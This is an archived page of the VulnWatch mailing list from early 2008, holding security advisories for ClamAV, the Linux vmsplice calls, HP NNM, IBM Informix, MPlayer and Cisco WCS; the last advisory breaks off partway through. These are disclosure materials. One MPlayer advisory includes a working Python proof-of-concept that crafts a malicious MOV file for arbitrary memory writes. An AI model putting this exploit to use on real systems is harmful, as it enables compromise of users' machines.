Nabble - Vulnerability - VulnWatch

Source Boston 2008 security con, March 12-14

2008-02-19T07:57:35Z

There is a new security con coming up that I wanted to let people know
about. I am on the advisory committee and I will be speaking as part of
the L0pht reunion panel. The conference is Source Boston and it will be
occuring March 12-14 in Boston, Ma a few days before St. Patrick's Day.
So not only will there be great speakers but a Boston style pub crawl.

There is a great line up of speakers both from the technical side and the
business side so if you have any entrepreneurial inklings this should be
the perfect con for you.

Here is the schedule: http://www.sourceboston.com/sessions/

I hope to see you there!

-Chris

iDefense Security Advisory 02.12.08: ClamAV libclamav PE File Integer Overflow Vulnerability

2008-02-12T09:35:03Z

iDefense Security Advisory 02.12.08
http://labs.idefense.com/intelligence/vulnerabilities/
Feb 12, 2008

I. BACKGROUND

Clam AntiVirus is a multi-platform GPL anti-virus toolkit. ClamAV is
often integrated into e-mail gateways and used to scan e-mail traffic
for viruses. It supports virus scanning for a wide variety of packed
Portable Executable (PE) binaries. For more information visit the
vendor's web site at the following URL.

http://www.clamav.net/

II. DESCRIPTION

Remote exploitation of an integer overflow vulnerability in Clam
AntiVirus' ClamAV, as included in various vendors' operating system
distributions, allows attackers to execute arbitrary code with the
privileges of the affected process.

The vulnerability exists within the code responsible for parsing and
scanning PE files. While iterating through all sections contained in
the PE file, several attacker controlled values are extracted from the
file. On each iteration, arithmetic operations are performed without
taking into consideration 32-bit integer wrap.

Since insufficient integer overflow checks are present, an attacker can
cause a heap overflow by causing a specially crafted Petite packed PE
binary to be scanned. This results in an exploitable memory corruption
condition.

III. ANALYSIS

Exploitation of this vulnerability results in the execution of arbitrary
code with the privileges of the process using libclamav. In the case of
the clamd program, this will result in code execution with the
privileges of the clamav user. Unsuccessful exploitation results in the
clamd process crashing.

Address Space Layout Randomization (ASLR) and non-executable memory
protection technologies (such as DEP, NX, XD, PaX, etc) can help
mitigate exploitation of this type of vulnerability.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in ClamAV
0.92. Previous versions may also be affected.

V. WORKAROUND

Disabling the scanning of PE files will prevent exploitation.

If using clamscan, this can be done by running clamscan with the
'--no-pe' option.

If using clamdscan, set the 'ScanPE' option in the clamd.conf file to
'no'.

VI. VENDOR RESPONSE

The ClamAV team has addressed this vulnerability within version 0.92.1.
Additionally, the ClamAV team reports, "the vulnerable module was
remotely disabled via virus-db update on Jan 11th 2008."

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-0318 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

01/07/2008 Initial vendor notification
01/11/2008 Initial vendor response
02/12/2008 Coordinated public disclosure

IX. CREDIT

This vulnerability was reported to iDefense by Silvio Cesare.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@... for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.

CSA-L03: Linux kernel vmsplice unchecked user-pointer dereference

2008-02-11T23:50:49Z

===[ ABSTRACT ]=========================================================

A new vmsplice() system call was introduced in the 2.6.17 release of the
Linux kernel. In the 2.6.23 kernel the system call functionality has
been further extended resulting in two new critical vulnerabilities.

===[ AFFECTED SOFTWARE ]================================================

Linux 2.6.23 - 2.6.24

For the exact kernel version please refer to an information provided by
your vendor.

===[ DESCRIPTION ]======================================================

VULNERABILITY #1

Inappropriate dereference of user-supplied memory pointers in the
code beginning at line 1378 in the vmsplice_to_user() kernel
function (fs/splice.c):

---8<--- fs/splice.c:1378 ---8<---
error = get_user(base, &iov->iov_base);
/* ... */
if (unlikely(!base)) {
error = -EFAULT;
break;
}
/* ... */
sd.u.userptr = base;
/* ... */
size = __splice_from_pipe(pipe, &sd, pipe_to_user);
---8<--- fs/splice.c:1401 ---8<---

The code lacks validation of these pointers (i.e. with access_ok()).
The __splice_from_pipe() assumes these are valid user-memory pointers
and never makes any verification of them. The function dereferences the
pointers with __copy_to_user_inatomic() function (in pipe_to_user()) in
order to write data to user-process memory in this case leading to
possibility of arbitrary data (read from pipe) to arbitrary kernel
memory.

VULNERABILITY #2

The copy_from_user_mmap_sem() function copies data from user-process
memory with the use of __copy_from_user_inatomic() without validating
user-supplied pointer with access_ok():

---8<--- fs/splice.c:1188 ---8<---
partial = __copy_from_user_inatomic(dst, src, n);
---8<--- fs/splice.c:1188 ---8<---

This vulnerability leads to indirect reading of arbitrary kernel memory.

===[ IMPACT ]===========================================================

Vulnerabilities may lead to local system compromise including execution
of arbitrary machine code in the context of running kernel.

Vulnerability #1 has been successfully exploited on Linux 2.6.24.
Vulnerability #2 not tested.

===[ DISCLOSURE TIMELINE ]==============================================

1st Feb 2008 Vendor notification
8th Feb 2008 Public disclosure

===[ AUTHOR ]===========================================================

Wojciech Purczynski <cliph@...>

Wojciech Purczynski is a Security Researcher at Vulnerability Research
Labs, COSEINC PTE Ltd.
http://coseinc.com

Wojciech Purczynski is also a member of iSEC Security Research
http://isec.pl/

===[ LEGAL DISCLAIMER ]=================================================

Copyright (c) 2008 Wojciech Purczynski
Copyright (c) 2008 COSEINC PTE Ltd.

All Rights Reserved.

PUBLISHING, DISTRIBUTING, PRINTING, COPYING, SCANNING, DUPLICATING IN
ANY FORM, MODIFYING WITHOUT PRIOR WRITTEN PERMISSION IS STRICTLY
PROHIBITED.

THE DOCUMENT IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. THE
CONTENT MAY CHANGE WITHOUT NOTICE. IN NO EVENT SHALL THE AUTHORS BE
LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES, INJURIES,
LOSSES OR UNLAWFUL OFFENCES.

USE AT YOUR OWN RISK.

iDefense Security Advisory 02.04.08: Hewlett-Packard Network Node Manager Topology Manager Service DoS Vulnerability

2008-02-06T11:19:06Z

iDefense Security Advisory 02.04.08
http://labs.idefense.com/intelligence/vulnerabilities/
Feb 04, 2008

I. BACKGROUND

HP Network Node Manager is a network mapping and management application
that allows administrators to monitor and control their networks. The
ovtopmd process listens, in a default configuration, on TCP port 2532.
More information can be found on the vendor's site at the following
URL.

http://h20229.www2.hp.com/products/nnm/index.html

II. DESCRIPTION

Remote exploitation of a denial of service vulnerability in
Hewlett-Packard's Network Node Manager product allows attackers to
crash the ovtopmd process.

The ovtopmd process contains an implementation error, in which it
attempts to access an invalid memory address based on data within the
TCP stream. By sending a specially crafted request, an attacker can
cause the service to crash.

III. ANALYSIS

Exploitation allows an attacker to crash the ovtopmd process. In order
to exploit this vulnerability, an attacker must be able to establish a
session with the service on TCP port 2532. No authentication is
required to access the vulnerable code path.

IV. DETECTION

iDefense has confirmed this vulnerability in HP's OpenView Network Node
Manager 7.5 with all updates applied as of May 14th, 2007.

V. WORKAROUND

Employing firewalls to limit access to the affected service will
mitigate exposure to this vulnerability.

VI. VENDOR RESPONSE

Hewlett-Packard has addressed this vulnerability in the HPSBMA02307
(SSRT071420) security bulletin. For more information, visit the
following URL.

http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01321117

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-0212 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

05/14/2007 Initial vendor notification
05/15/2007 Initial vendor response
02/04/2008 Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@... for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.

iDefense Security Advisory 01.31.08: IBM Informix Dynamic Server onedcu File Creation Vulnerability

2008-02-04T11:49:53Z

iDefense Security Advisory 01.31.08
http://labs.idefense.com/intelligence/vulnerabilities/
Jan 31, 2008

I. BACKGROUND

IBM Corp.'s Informix Dynamic Server is an online transaction processing
data server. For more information, visit the product's homepage at the
following URL.

http://www-306.ibm.com/software/data/informix/ids/

II. DESCRIPTION

Local exploitation of a file creation vulnerability in IBM Corp.'s
Informix Dynamic Server allows attackers to elevate privileges to root.

The set-uid root "onedcu" command requires six parameters to be
specified when it is executed. The second parameter is a "Trace" file
that this program will open and write to with elevated privileges.

III. ANALYSIS

Exploitation allows local attackers to gain root privileges.

IV. DETECTION

iDefense confirmed the existence of this vulnerability in IBM Corp.'s
Informix Dynamic Server version 10.00 UC6TL installed on a Linux
system. Other versions are also suspected as vulnerable. Versions for
other supported Unix systems should also be considered vulnerable.

V. WORKAROUND

Removing the set-uid bit from the "onedcu" program included with
Informix will prevent exploitation. However, this could disable some
functionality for non-root users.

VI. VENDOR RESPONSE

IBM Corp. has addressed this vulnerability with the release of version
10.00.xC8 of Informix Dynamic Server. For more information, visit the
following URL.

http://www-1.ibm.com/support/docview.wss?uid=swg27011556

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-0368 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

09/01/2007 Initial vendor notification
09/13/2007 Initial vendor response
01/31/2008 Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@... for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.

iDefense Security Advisory 01.31.08: IBM Informix Dynamic Server SQLIDEBUG File Creation Vulnerability

2008-02-04T11:48:20Z

iDefense Security Advisory 01.31.08
http://labs.idefense.com/intelligence/vulnerabilities/
Jan 31, 2008

I. BACKGROUND

IBM Corp.'s Informix Dynamic Server is an online transaction processing
data server. For more information, visit the product's homepage at the
following URL.

http://www-306.ibm.com/software/data/informix/ids/

II. DESCRIPTION

Local exploitation of a file creation vulnerability in IBM Corp.'s
Informix Dynamic Server allows attackers to elevate privileges to root.

When the SQLIDEBUG environment variable is set, several set-uid binaries
will log debugging information to the specified file.

III. ANALYSIS

Exploitation allows local attackers to gain root privileges.

After creating the file, the file's ownership is changed to match the
user and group of the executing user. As such, an attacker could create
files that they own anywhere on the system.

IV. DETECTION

iDefense confirmed the existence of this vulnerability in IBM Corp.'s
Informix Dynamic Server version 10.00 UC6TL installed on a Linux
system. Other versions are also suspected as vulnerable. Versions for
other supported Unix systems should also be considered vulnerable.

V. WORKAROUND

Removing the set-uid bit from all programs included with Informix will
prevent exploitation. However, this could disable some functionality
for non-root users.

VI. VENDOR RESPONSE

IBM Corp. has addressed this vulnerability with the release of version
10.00.xC8 of Informix Dynamic Server. For more information, visit the
following URL.

http://www-1.ibm.com/support/docview.wss?uid=swg27011556

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-0369 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

09/01/2007 Initial vendor notification
09/13/2007 Initial vendor response
01/31/2008 Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@... for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.

CORE-2007-1218: MPlayer 1.0rc2 buffer overflow vulnerability

2008-02-04T11:43:30Z

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs

MPlayer 1.0rc2 buffer overflow vulnerability

*Advisory Information*

Title: MPlayer 1.0rc2 buffer overflow vulnerability
Advisory ID: CORE-2007-1218
Advisory URL: http://www.coresecurity.com/?action=item&id=2103
Date published: 2008-02-04
Date of last update: 2008-02-01
Vendors contacted: MPlayer and Xine team
Release mode: Coordinated release

*Vulnerability Information*

Class: Buffer overflow
Remotely Exploitable: No
Locally Exploitable: Yes
Bugtraq ID: 27441
CVE Name: CVE-2008-0486

*Vulnerability Description*

The MPlayer package [1] is vulnerable to a buffer overflow attack, which
can be exploited by malicious remote attackers. The vulnerability is due
to MPlayer not properly sanitizing certain tags on a FLAC file before
using them to index an array on the stack. This can be exploited to
execute arbitrary commands by opening a specially crafted file.

The Xine package [2], and probably other packages based on MPlayer [3],
are vulnerable to this attack too.

*Vulnerable Packages*

. MPlayer 1.0rc2 and SVN before r25917 (Tue Jan 29 22:00:58 2008 UTC).
Older versions are probably affected too, but they were not checked.
. Xine-lib 1.1.10. Other MPlayer related projects are affected too.

*Non-vulnerable Packages*

. MPlayer SVN HEAD after r25917.
. MPlayer 1.0rc2 + security patches.

*Vendor Information, Solutions and Workarounds*

A fix for this problem was committed to SVN on the MPlayer project [4].
Users of affected MPlayer versions should download a patch [5] for
MPlayer 1.0rc2 or update to the latest version if they are using SVN.

*Credits*

This vulnerability was discovered by Damian Frizza and Alfredo Ortega,
from the Exploit Writers team of Core Security Technologies.

*Technical Description / Proof of Concept Code*

The vulnerability was found in the following code, used to parse FLAC
comments inside MPlayer:

/-----------

libmpdemux/demux_audio.c

206 case FLAC_VORBIS_COMMENT:
207 {
208 /* For a description of the format please have a look at */
209 /* http://www.xiph.org/vorbis/doc/v-comment.html */
210
211 uint32_t length, comment_list_len;
212 (1) char comments[blk_len];
213 uint8_t *ptr = comments;
214 char *comment;
215 int cn;
216 char c;
217
218 if (stream_read (s, comments, blk_len) == blk_len)
219 {
220 (2) length = AV_RL32(ptr);
221 ptr += 4 + length;
222
223 comment_list_len = AV_RL32(ptr);
224 ptr += 4;
225
226 cn = 0;
227 for (; cn < comment_list_len; cn++)
228 {
229 length = AV_RL32(ptr);
230 ptr += 4;
231
232 comment = ptr;
233 (3) c = comment[length];
234 comment[length] = 0; ...

- -----------/

We can see in (2) that the 'length' variable is being loaded from a
position on the file stream, and then used without any validation to
index the 'comment' buffer, that was allocated from the stack in (1).
This causes a stack corruption, and possibly allows code execution (e.g.
modifying the value of the 'length' variable, that is also on the stack).

Example Attack Scenario:

1) The user receives an email with an attachment called e.g.
'goodmusic.flac'.
2) The user opens the file with MPlayer or another vulnerable software.
3) This causes a stack corruption and malicious code execution on the
user computer.

*Report Timeline*

. 2007-12-18: Core Security Technologies notifies the MPlayer team of
the vulnerability (no reply received).
. 2008-01-04: A new notification of the vulnerability was sent to the
MPlayer team (no reply received).
. 2008-01-18: A new notification of the vulnerability was sent to the
MPlayer team.
. 2008-01-18: The MPlayer team asked Core Security Technologies for
technical description of the vulnerability.
. 2008-01-22: Technical details was sent to MPlayer team by Core
Security Technologies.
. 2008-01-28: MPlayer notified Core Security Technologies that a fix had
been produced.
. 2008-02-04: CORE-2007-1218 advisory was published.

*References*

[1] http://www.mplayerhq.hu
[2] http://xinehq.de/
[3] http://www.mplayerhq.hu/design7/projects.html
[4]
http://svn.mplayerhq.hu/mplayer/trunk/libmpdemux/demux_audio.c?r1=25911&r2=25917
[5] http://www.mplayerhq.hu/MPlayer/patches/demux_audio_fix_20080129.diff

*About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs/.

*About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.

*Disclaimer*

The contents of this advisory are copyright (c) 2008 Core Security
Technologies and (c) 2008 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.

*GPG/PGP Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHp2riyNibggitWa0RApD/AKCtN46G9t/7fMEutRQbUx6uVKonDwCfWYcb
g+kdvVlvzynfGW8XUUI1v7w=
=Byqy
-----END PGP SIGNATURE-----

CORE-2008-0122: MPlayer arbitrary pointer dereference

2008-02-04T11:27:16Z

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs

MPlayer arbitrary pointer dereference

*Advisory Information*

Title: MPlayer arbitrary pointer dereference
Advisory ID: CORE-2008-0122
Advisory URL: http://www.coresecurity.com/?action=item&id=2102
Date published: 2008-02-04
Date of last update: 2008-01-30
Vendors contacted: MPlayer team
Release mode: Coordinated release

*Vulnerability Information*

Class: Buffer overflow
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: 27499
CVE Name: CVE-2008-0485

*Vulnerability Description*

The MPlayer package [1] is vulnerable to an arbitrary pointer
dereference vulnerability, which can be exploited by malicious remote
attackers to compromise a user's system. The vulnerability is caused by
the MPlayer libmpdemux ('demux_mov.c') library not properly sanitizing
certain tags on a MOV file before using them to index an array on the
heap. This can be exploited to execute arbitrary commands by opening a
specially crafted file.

*Vulnerable Packages*

. MPlayer 1.0 rc2.
. Older versions are probably affected too, but they were not checked.

*Non-vulnerable Packages*

. MPlayer SVN HEAD after r25922 (Tue Jan 29 22:14:00 2008 UTC).
. MPlayer 1.0rc2 + security patches.

*Vendor Information, Solutions and Workarounds*

A fix for this problem was committed to SVN on the MPlayer project [2].
Users of affected MPlayer versions should download a patch [3] for
MPlayer 1.0rc2 or update to the latest version if they are using SVN.

*Credits*

This vulnerability was discovered and researched by Felipe Manzano and
Anibal Sacco from Core Security Technologies.

*Technical Description / Proof of Concept Code*

First some information from Quicktime File Format Specification (may 1996):

"A QuickTime file stores the description of the media separately from
the media data. The description, or meta-data, is called the movie and
contains information such as the number of tracks, video compression
format, and timing information. The movie also contains an index of
where all the media data is stored. The media data is all of the actual
sample data, such as video frames and audio samples. The media data may
be stored in the same file as the QuickTime movie, in a separate file,
or in several files.

...QuickTime uses two basic structures for storing information: atoms
and QT atoms. Both atoms and QT atoms allow you to construct arbitrarily
complex hierarchical data structures. Both also allow applications to
ignore data they don't understand."

An atom field has a LTV format (Length - Tag - Value) and the sizes are
the following:

/-----------

+--------------+
| Size | (32 bits)
+--------------+
| Tag | (32 bits)
+--------------+
| Payload | (variable, which could contain other atoms inside)
+--------------+

- -----------/

The MPlayer software walks these atoms structures and parses the
'Payload' fields. The vulnerability occurs when parsing the 'stsc' atom
tag (which could be contained or not inside another atom) as we explain
below.

At 'mov_demux.c' (line 1768) an array of 'chunkmap' structures is filled
by reading data straight from file without any kind of check. Then, at
'mov_build_index()' (line 150), the 'trak->chunkmap[i].first' field is
used to index the heap array 'chunks' allowing an attacker to write the
'sdid' and 'spc' values at some memory address relative to that heap
pointer causing a memory corruption. This could be used to overwrite
function pointers or some critical data allowing an attacker to get code
execution.

Besides, it is possible to fool the parser in a way such that no memory
is allocated for the array pointed by 'trak->chunks', being initialized
to 0 (at line 1301). Doing this will remove the "relative to that heap
pointer" restriction allowing an attacker to write partially at almost
any memory address.

Why partially? Because the structure used to write is declared in this way:

/-----------

typedef struct {
unsigned int sample; // number of the first sample in the chunk
unsigned int size; // number of samples in the chunk
int desc; // for multiple codecs mode - not used
off_t pos;
} mov_chunk_t;

- -----------/

So, being 'desc' and 'size' the controlled fields it is possible to
write at memory address: 'i*sizeof(chunk_t)+4' and 'i*sizeof(chunk_t)+8'
for any 'i' value (at lines 177 and 178).

/-----------

1755 case MOV_FOURCC('s','t','s','c'): {
1756 int temp = stream_read_dword(demuxer->stream);
1757 int len = stream_read_dword(demuxer->stream);
1758 int ver = (temp << 24);
1759 int flags = (temp << 16) | (temp << 8) | temp;
1760 int i;
1761 mp_msg(MSGT_DEMUX, MSGL_V,
1762 "MOV: %*sSample->Chunk mapping table! (%d blocks)
(ver:%d,flags:%d)\n", level, "",
1763 len, ver, flags);
1764 // read data:
1765 trak->chunkmap_size = len;
1766 trak->chunkmap = calloc(len, sizeof(mov_chunkmap_t));
1767 for (i = 0; i < len; i++) {
1768 trak->chunkmap[i].first = stream_read_dword(demuxer->stream) - 1;
1769 trak->chunkmap[i].spc = stream_read_dword(demuxer->stream);
1770 trak->chunkmap[i].sdid = stream_read_dword(demuxer->stream);
1771 }
1772 break;
1773 }

150 void mov_build_index(mov_track_t* trak,int timescale){
151 int i,j,s;
152 int last=trak->chunks_size;
153 unsigned int pts=0;
154
169 mp_msg(MSGT_DEMUX, MSGL_V, "MOV track #%d: %d chunks, %d
samples\n",trak->id,trak->chunks_size,trak->samples_size);
170 mp_msg(MSGT_DEMUX, MSGL_V, "pts=%d scale=%d
time=%5.3f\n",trak->length,trak->timescale,(float)trak->length/(float)trak->timescale);
171
172 // process chunkmap:
173 i=trak->chunkmap_size;
174 while(i>0){
175 --i;
176 for(j=trak->chunkmap[i].first;j<last;j++){
177 trak->chunks[j].desc=trak->chunkmap[i].sdid;
178 trak->chunks[j].size=trak->chunkmap[i].spc;
179 }
180 last=trak->chunkmap[i].first;
181 }

- -----------/

In this way, as we show in the following PoC, it is possible to build a
file that contains specially crafted 'stsc' atoms allowing an attacker
to write any value in practically any address. With this clear and some
voodoo magic it is possible to write a scattered payload that builds a
fully functional shellcode on some other place to subsequently jump to.

The following PoC python code demonstrates the vulnerability.

/-----------

#!/bin/python

import struct
import sys

def mkatom(type,data):
if len(type) != 4:
raise "type must by of length 4!!!"
mov = ""
mov += struct.pack(">L",len(data)+8)
mov += type
mov += data
return mov

def poc(address, block_size):

what=struct.pack(">L", 0x41414141) * 2 # Writes an 8 bytes chunk
base= ((address - 8) / block_size) +1

ftyp = mkatom("ftyp","3gp4"+"\x00\x00\x02\x00"+"3gp4"+"3gp33gp23gp1")
mdat = mkatom("mdat","MALDAAAAAD!")
stsc = mkatom("stsc",struct.pack(">L",1) + \
struct.pack(">L",2) + \
struct.pack(">L",base) + \
what + \
struct.pack(">L",base+300)+what)
trak = mkatom("trak",stsc)
moov = mkatom("moov",trak)

file = ftyp + mdat + moov
return file

try:
if sys.argv[2] != "linux":
evilness = poc(0x0122e000, 24) #Windows XP SP2 Prof. ES
else:
evilness = poc(0x088aa020, 20) #Linux Gentoo

print "[+] Generating file: %s" % sys.argv[1]
file = open(sys.argv[1], "wb")
file.write(evilness)
file.close()
print "[+] Done."

except Exception, e:
print "[+] Usage: python mplayer_poc.py filename.mov windows (For
WinXP Prof SP2 ES)"
print " python mplayer_poc.py filename.mov linux (For
Linux Gentoo)"

- -----------/

*Report Timeline*

. 2008-01-18: Core Security Technologies notifies the MPlayer team of
the vulnerability.
. 2008-01-18: The MPlayer team asks Core Security Technologies for
technical description of the vulnerability.
. 2008-01-22: Technical details sent to MPlayer team by Core Security
Technologies.
. 2008-01-28: MPlayer notifies Core Security Technologies that a fix has
been produced.
. 2008-02-04: CORE-2008-0122 advisory is published.

*References*

[1] http://www.mplayerhq.hu
[2]
http://svn.mplayerhq.hu/mplayer/trunk/libmpdemux/demux_mov.c?r1=25920&r2=25922
[3] http://www.mplayerhq.hu/MPlayer/patches/demux_mov_fix_20080129.diff

*About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs/.

*About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.

*Disclaimer*

The contents of this advisory are copyright (c) 2008 Core Security
Technologies and (c) 2008 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.

*GPG/PGP Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHp2cUyNibggitWa0RAt6mAJ49+DbotNeLAGZsUT+GngtZsKrRJQCeOL0d
cHhAkwi751HR3NJSPFW7CxA=
=sS4h
-----END PGP SIGNATURE-----

Cisco Security Advisory: Cisco Wireless Control System Tomcat mod_jk.so Vulnerability

2008-01-30T08:58:45Z

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Cisco Security Advisory: Cisco Wireless Control System Tomcat mod_jk.so
Vulnerability

Advisory ID: cisco-sa-20080130-wcs

http://www.cisco.com/warp/public/707/cisco-sa-20080130-wcs.shtml

Revision 1.0

For Public Release 2008 January 30 1600 UTC (GMT)

+-----------------------------------------------------------------------

Summary
=======

Apache Tomcat is the servlet container for JavaServlet and JavaServer
Pages Web within the Cisco Wireless Control System (WCS). A
vulnerability exists in the mod_jk.so URI handler within Apache Tomcat
which, if exploited, may result in a remote code execution attack.

This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20080130-wcs.shtml.

Affected Products
=================

This section provides details on affected products.

Vulnerable Products
+------------------

Cisco WCS devices running software 3.x and 4.0.x prior to 4.0.100.0 are
affected by this vulnerability. Cisco WCS devices running software 4.1.x
and 4.2.x prior to to version 4.2.62.0 are also vulnerable.

Note: The version of WCS software installed on a particular device can
be found via the WCS HTTP management interface. Select
"Help -> About the Software" to obtain the software version.

Products Confirmed Not Vulnerable
+--------------------------------

No other Cisco products are currently known to be affected by this
vulnerability.

Details
=======

The Cisco Wireless Control System is a centralized, systems-level
platform for managing and controlling lightweight access points,
wireless LAN controllers, and Wireless Location Appliances for the
Cisco Unified Wireless Network. The Cisco Wireless Control System uses
Apache Tomcat. A vulnerability in Apache Tomcat may allow for remote
code execution attacks. The mod_jk.so URI handler does not handle long
URLs correctly. An insecure memory copy triggers an exploitable stack
overflow. This vulnerability is documented in CVE-2007-0774 and in Cisco
bug ID CSCsk18191.

Vulnerability Scoring Details
+----------------------------

Cisco has provided scores for the vulnerability in this advisory based
on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in
this Security Advisory is done in accordance with CVSS version 2.0.

CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.

Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of the
vulnerability in individual networks.

Cisco has provided an FAQ to answer additional questions regarding CVSS
at

http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html.

Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at

http://intellishield.cisco.com/security/alertmanager/cvss.

CSCsk18191 - WCS mod_jk.so Apache Tomcat vulnerability

CVSS Base Score - 10.0
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete

CVSS Temporal Score - 8.3
Exploitability - Functional
